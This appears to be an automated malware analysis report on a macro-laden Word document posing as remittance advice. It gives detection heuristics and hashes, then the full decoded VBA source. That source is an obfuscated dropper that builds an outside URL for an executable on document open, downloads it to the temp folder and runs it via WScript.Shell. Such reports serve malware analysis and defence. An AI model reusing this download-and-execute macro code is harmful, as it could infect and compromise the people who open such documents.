Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 39302b664dd5a76e…

MALICIOUS

Office (OLE)

84.0 KB Created: 2016-05-11 14:00:00 Authoring application: Microsoft Office Word First seen: 2017-12-09
MD5: 326dbea2f99a1be3a60e4ad649587736 SHA-1: 11b2cb8384170b0e12a39f23d2a62e3365439591 SHA-256: 39302b664dd5a76e69399cff62e3f231570bfc36ef95b5ffb5550ea43069421a
338 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. Critical heuristics indicate the use of WScript.Shell and a Shell() call, suggesting the macro attempts to execute arbitrary commands or download further payloads. The document body presents itself as remittance advice, indicating a lure to trick the user into performing an action, likely related to payment fraud.

Heuristics 11

  • ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Dim gFhrfphULi As String, qqQWMQOv As Integer
    Set RsRHOxt = CreateObject("WScript.Shell")
    End Function
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Public Function BLwgX() As Object
    Set BLwgX = CreateObject("ADODB.Stream")
    End Function
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Dim xtxWl As String
    OxyRpTO = CallByName(StJxh, WoVjdRAKfa, 2)
    End Function
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
    Private Sub Document_Open()
    Dim ZPDPHnj As Integer
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Fake invoice / payment lure low SE_INVOICE_LURE
    Document contains invoice or payment language paired with an action verb — useful context when combined with link, macro, or attachment indicators
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9410 bytes
SHA-256: e120635caa70ea9e37afb29499d2698984d28df981310822032a308828415916
Detection
ClamAV: No threats found
Obfuscation or payload: likely
173 of 245 identifiers look randomly generated (e.g. 'D9n8ea6aJgcDGudvCdCQP1RI5pyipWMFD') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function lXiYi() As Integer
hFrQPtBp
iOEGGBQELK
lXiYi = 4779
End Function
Private Sub Document_Open()
Dim ZPDPHnj As Integer
auEprygAY.lKWcTTtPJ
End Sub
Private Sub IyTFndQ(ByVal tWaHbJWa As Integer)
kKhjcbO
If kbFfJcWPDT("5FjTr4lJor1mKl1h1JBVm6sU", 6938) Then
Vvqbl
fCDqvdI
tMRaXX 5233, "c4TFbvaAyIX5rWuREEh8ZkO", 762
End If
End Sub
Private Sub xpDvI(ByVal FwqWu As Integer, ByVal bKQsLfPtT As Integer)
WbFWObBP
End Sub
Private Sub charbjS(ByVal ouZXrRprh As String, ByVal WarvJN As Boolean)
hpyzkXXV "ZzKMg6L0yvZc1f9q6v2PJoAQPV", False, 6811
NhNNP 1698, 8412
If iqsSlw Then
HXncUHot "29PX0LE0fZL864UxOvYjjoi"
KvgAFCY
HSewNUUfX "3um6pEKi48VN7SZDmOp4i4Lai"
Else
eBXHSXxSTm
End If
XPKypJaPJ 6078, True, 3113
End Sub

Attribute VB_Name = "AhMxBWnqtk"
Public Function BLwgX() As Object
Set BLwgX = CreateObject("ADODB.Stream")
End Function
Public Function bAOYIYwzVu() As Object
Dim wdcRVtTy As Integer
Set bAOYIYwzVu = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
Public Function RsRHOxt() As Object
Dim gFhrfphULi As String, qqQWMQOv As Integer
Set RsRHOxt = CreateObject("WScript.Shell")
End Function

Attribute VB_Name = "auEprygAY"
Private Function dZFlZbzB() As String
dZFlZbzB = soCxCNgfM.vEyNPDc("wRe3wspwowrnsr3erBow3dyw", "rw3")
End Function
Private Function EsjjF() As String
Dim KNnxjYxl As Integer
Dim XSqpMFANqW As Boolean
EsjjF = jgIuHteWrZ(NxslbV, gCNEPU, gCNEPU) & wkSHQDT
End Function
Private Sub yUKCDGN(ByVal kNqvTwNQ As String, ByVal VHgEamb As Boolean, ByVal JNSTSTzs As Integer, ByVal YSvyOrq As Variant)
Dim CRUQckgk As Boolean, CwzbrzK As Integer
Set khkEFNwpi = AhMxBWnqtk.BLwgX
IcHxH.pbSzXF 708, soCxCNgfM.vEyNPDc("Taayqpae", "7qa."), 3110, 1, khkEFNwpi
IcHxH.VfBUigVqkN soCxCNgfM.vEyNPDc("OXpresns", "r.Xtsu"), khkEFNwpi
IcHxH.xvkmxtH soCxCNgfM.vEyNPDc("EWrQi3EteE", "3QEN"), 6128, khkEFNwpi, YSvyOrq, rGdFp
IcHxH.YQIiss kNqvTwNQ, 2, bDTFPqASYt, khkEFNwpi
IcHxH.VfBUigVqkN bsfybGhP, khkEFNwpi
End Sub
Private Sub nXiGR()
Dim SPxvjqou As Boolean, OBfNwD As String
On Error GoTo UFFVJKr
jJZPfnZK 2612, EsjjF, yMMoecQyj
sBZbi EsjjF
RPCxFN = "f0hdcBgLhhKoSzKpHR3Fi"
Exit Sub
vkLGZ = 5682
UFFVJKr:
End Sub
Private Function rGdFp() As String
rGdFp = "CnzyqzlK02NiKl6u9f0"
End Function
Private Sub sBZbi(ByVal VVedtni As String)
IcHxH.xvkmxtH SXTEF, 6128, AhMxBWnqtk.RsRHOxt, VVedtni, zAbbQBDn
End Sub
Private Function zAbbQBDn() As String
zAbbQBDn = "mO0qpdr8ltDdA9zhvwHnvXdEfIETVq3qi"
End Function
Private Function jgIuHteWrZ(ByVal mbRPl As String, ByVal oYlYSIynSk As String, ByVal beruZwqxJz As String) As String
Dim RwsXvwx As String
JixRwEJkN = False
Set MJmjj = IcHxH.REnyVsUSe(soCxCNgfM.vEyNPDc("EW7nvFWiHro6Hnm7FeHnFt", "6H47WF"), False, 7872, AhMxBWnqtk.RsRHOxt, soCxCNgfM.vEyNPDc("wPR6Od6CdESwiS", "xdtw6i"))
jgIuHteWrZ = MJmjj(mbRPl)
End Function
Private Function yMMoecQyj() As String
Dim AUjlAPk As Boolean
Dim jdqfOANBzu As Boolean
yMMoecQyj = BFppclZqB
End Function
Private Function SEcuPpcS() As String
NXgcHedZ = "DKva5T1tzt9uNk8v4XRls0dGWsm"
SEcuPpcS = soCxCNgfM.vEyNPDc("S2Ce2nd2", "2Co")
End Function
Private Function BFppclZqB() As String
BFppclZqB = soCxCNgfM.vEyNPDc("hXt8XtpX:X/XX/Xol80c0ayX0f0o0to8g0r8XafX.0c0o0mX/08sy8s08t0e8m/0c0Xa8ch08e/88wXo8r0d.8e8x08e", "0X8")
End Function
Private Function wkSHQDT() As String
Dim osqqg As String
wkSHQDT = PgjYTcLSA
End Function
Private Function bsfybGhP() As String
bsfybGhP = soCxCNgfM.vEyNPDc("Ciliopiske", "tkpi")
End Function
Private Sub cWunX(ByVal IdapnfkR As Integer, ByVal GnovfyogN As Boolean)
nlzlivrN 5254, False, False
bHCdDp True, 2221
dKGQB 8006, True, 7782
If fCAhhnf(9180) Then
XWIMFEtxub False
IXexmLYhXX
VDDMzyez 9562
Else
gcJTlZZrR 2876, False
End If
ihWWxOEu 7730, True, "XoamEjGkrsULGIYVxAdTAtN"
End Sub
Private Function SXTEF() As String
JywcHztmR = "zRHMmUrWttZzZ9pZy0DhYO2ZT"
SXTEF = soCxCNgfM.vEyNPDc("rEWxteWc", "1rWt")
End Function
Private Function xOZypMMv() As String
If pjTUCKd(5843, "WJkEt1QVkfJatERcy") Then
zeMphePZDz 1173, "zWo3eg5qzn72lf0oXj"
zUtoVINdP 2806, "D9n8ea6aJgcDGudvCdCQP1RI5pyipWMFD", 559
jvyLJjMjyn
End If
xOZypMMv = "bNUq5BQ0ZBhpt9kbPuBaAnrch"
End Function
Private Function FQymqif() As String
FQymqif = soCxCNgfM.vEyNPDc("MZPoZziZPllPaPx/5xZ.0ZP P(xcoZmZpxaPtZZiZbZlZe;xx PMZSxIPE ZP9.Px0;PZ PWxinxxdPowPsPP PNPTP P7Z.1x;x PxTrxPixdePxnZt/P5x.P0P)P", "PxZ")
End Function
Private Function Xjuzm() As String
Xjuzm = soCxCNgfM.vEyNPDc("OXpresns", "r.Xtsu")
End Function
Private Sub jJZPfnZK(ByVal tisIc As Integer, ByVal GefBHbzaXv As String, ByVal FaoowUobC As String)
Dim cLion As Integer, QmSSGLrIL As Integer
Set hGAjCtoVF = AhMxBWnqtk.bAOYIYwzVu
vAhuigCxLB = "9xhByeXuU4T8HBZF8Hhk5uhAYB"
IcHxH.SmzXbpy False, soCxCNgfM.vEyNPDc("6GE Ta", " a96S"), False, FaoowUobC, Xjuzm, hGAjCtoVF
IcHxH.YQIiss soCxCNgfM.vEyNPDc("U.sNeTNrN-ANgNTenNt.", "mT.N"), FQymqif, soCxCNgfM.vEyNPDc("SDe3tQKRKeqPuDPePst3HDDeaQd3eKDr", "QPD3K"), hGAjCtoVF
IcHxH.VfBUigVqkN SEcuPpcS, hGAjCtoVF
yUKCDGN GefBHbzaXv, True, 3347, IcHxH.OxyRpTO(hGAjCtoVF, dZFlZbzB)
End Sub
Private Function PgjYTcLSA() As String
PgjYTcLSA = soCxCNgfM.vEyNPDc("/oo86ioeh7h1i8i1bh6on9nbenn41oic3i.iheoxoe", "ohin")
End Function
Public Sub lKWcTTtPJ()
Dim SqJSN As Integer
nXiGR
End Sub
Private Function khqaO() As Integer
WmkFh
cIsPekWV 9366
khqaO = 9266
End Function
Private Function gCNEPU() As String
gCNEPU = "ZsQRpJyqrEfx0pahbORP4CIPxKWxB8"
End Function
Private Function bDTFPqASYt() As String
bDTFPqASYt = soCxCNgfM.vEyNPDc("6Sakbve66T6oFbkibl6e", "6kb")
End Function
Private Function NxslbV() As String
NxslbV = soCxCNgfM.vEyNPDc("ZTEZIMPZ", "ZoWIO")
End Function

Attribute VB_Name = "gfYLB"
Private Sub fCYrmmp(ByVal KHSZKSELI As String)
XHvfGalf
BZbDy False, True, 5361
End Sub
Private Sub meivLAFp()
UKUhJchCfN False
UOlvZCoKSe "lPgLNAgVIX6iGi8oYQ", 3119
BWDat "IBlZXr1cC7xCrTXSY"
End Sub
Private Function EwykVwBOmO(ByVal MPRjdx As String, ByVal PvrVyPhX As String) As Boolean
UiaKS 8628
jalCYyVT
wbAhL 7029
EwykVwBOmO = True
End Function
Private Sub THUJA(ByVal vxUtLeX As Boolean, ByVal oajGKRL As String)
mokZnpH
HulbI "oacgqxYhSECRMY4eq"
End Sub
Public Function dnBNLei(ByVal MvdRYUs As String, ByVal AIRHvAL As String, ByVal GYaCQeX As Integer) As Boolean
Dim nRofJwYlF As Boolean
dnBNLei = InStr(1, AIRHvAL, MvdRYUs)
End Function
Public Function OnRDVW(ByVal WNvRt As String, ByVal GwdDFPw As Integer) As String
Dim KTkUIkFCNQ As Boolean
Dim FAWvHmr As Boolean
OnRDVW = Mid(WNvRt, GwdDFPw, 1)
End Function

Attribute VB_Name = "IcHxH"
Public Function OxyRpTO(ByVal StJxh As Object, ByVal WoVjdRAKfa As String) As Variant
Dim xtxWl As String
OxyRpTO = CallByName(StJxh, WoVjdRAKfa, 2)
End Function
Public Sub YQIiss(ByVal AWdDQXq As Variant, ByVal kUTFuiOT As Variant, ByVal dVNMpzEm As String, ByVal AXtBhR As Object)
CallByName AXtBhR, dVNMpzEm, 1, AWdDQXq, kUTFuiOT
End Sub
Public Sub xvkmxtH(ByVal kfMoXx As String, ByVal KOrQktg As Integer, ByVal oQsYFaipbj As Object, ByVal zSNkARtup As Variant, ByVal pjLwYjHcHG As String)
Dim kpyPvtMf As Boolean, YoAekV As String
CallByName oQsYFaipbj, kfMoXx, 1, zSNkARtup
End Sub
Public Sub VfBUigVqkN(ByVal sqQziJwCV As String, ByVal zQtloNToEj As Object)
Dim WHHPra As Integer, klFXu As Integer
CallByName zQtloNToEj, sqQziJwCV, 1
End Sub
Public Sub SmzXbpy(ByVal ZmiGKjq As Variant, ByVal YMxYm As Variant, ByVal VZqoptNc As Boolean, ByVal ogEFVZ As Variant, ByVal ZxlAx As String, ByVal rYmhaGJjfR As Object)
Dim qgeAaTMvRR As Boolean
OWoNkkz = "pfDcWhis0AOoI5zRyACmudMYD4"
CallByName rYmhaGJjfR, ZxlAx, 1, YMxYm, ogEFVZ, ZmiGKjq
End Sub
Public Function REnyVsUSe(ByVal UqIzKPrw As String, ByVal LCyerT As Boolean, ByVal hRehlfcJ As Integer, ByVal rYmhaGJjfR As Object, ByVal dHMvg As String) As Variant
Set REnyVsUSe = CallByName(rYmhaGJjfR, UqIzKPrw, 2, dHMvg)
End Function
Public Sub pbSzXF(ByVal YwvQDL As Integer, ByVal GHFpuhEmqy As String, ByVal blmJbadm As Integer, ByVal KrfhkIQ As Variant, ByVal CuQNug As Object)
Dim wYgUzAg As Integer, oViydMyrTP As Integer
xAnXsgtN = False
CallByName CuQNug, GHFpuhEmqy, 4, KrfhkIQ
End Sub

Attribute VB_Name = "soCxCNgfM"
Private Function AmBcob() As Boolean
puBqPC False, "wcHmthIEmg8DzeiqikJFtX8aSt"
AmBcob = True
End Function
Private Sub dMsbUxo(ByVal LdovjYvQ As String, ByVal aTrLc As Integer)
oRQsMB
End Sub
Public Function vEyNPDc(ByVal CbYXQ As String, ByVal ESrwfOX As String) As String
Dim UNuqY As Boolean, JgXpwpW As String
For IDypBIHSaE = 1 To Len(CbYXQ)
UNuqY = gfYLB.dnBNLei(gfYLB.OnRDVW(CbYXQ, IDypBIHSaE), ESrwfOX, 638)
MWgdETofR = 5559
If Not UNuqY Then
vEyNPDc = vEyNPDc & gfYLB.OnRDVW(CbYXQ, IDypBIHSaE)
LICDvxAOy = 7085
End If
Next
End Function
Private Function fNLPNyer() As Boolean
RiNRh 3745
fNLPNyer = True
End Function
Private Function oiIXlLkw(ByVal kEGKxM As Integer, ByVal MwVzL As Integer) As String
wzDcvaHzAL "FGu2ctX0CTLhs2iTdp5ZKy"
lLNzEN 414
yvqqniWt 6874, False, True
oiIXlLkw = "2VN10NB0l4aEcke4j1Ius"
End Function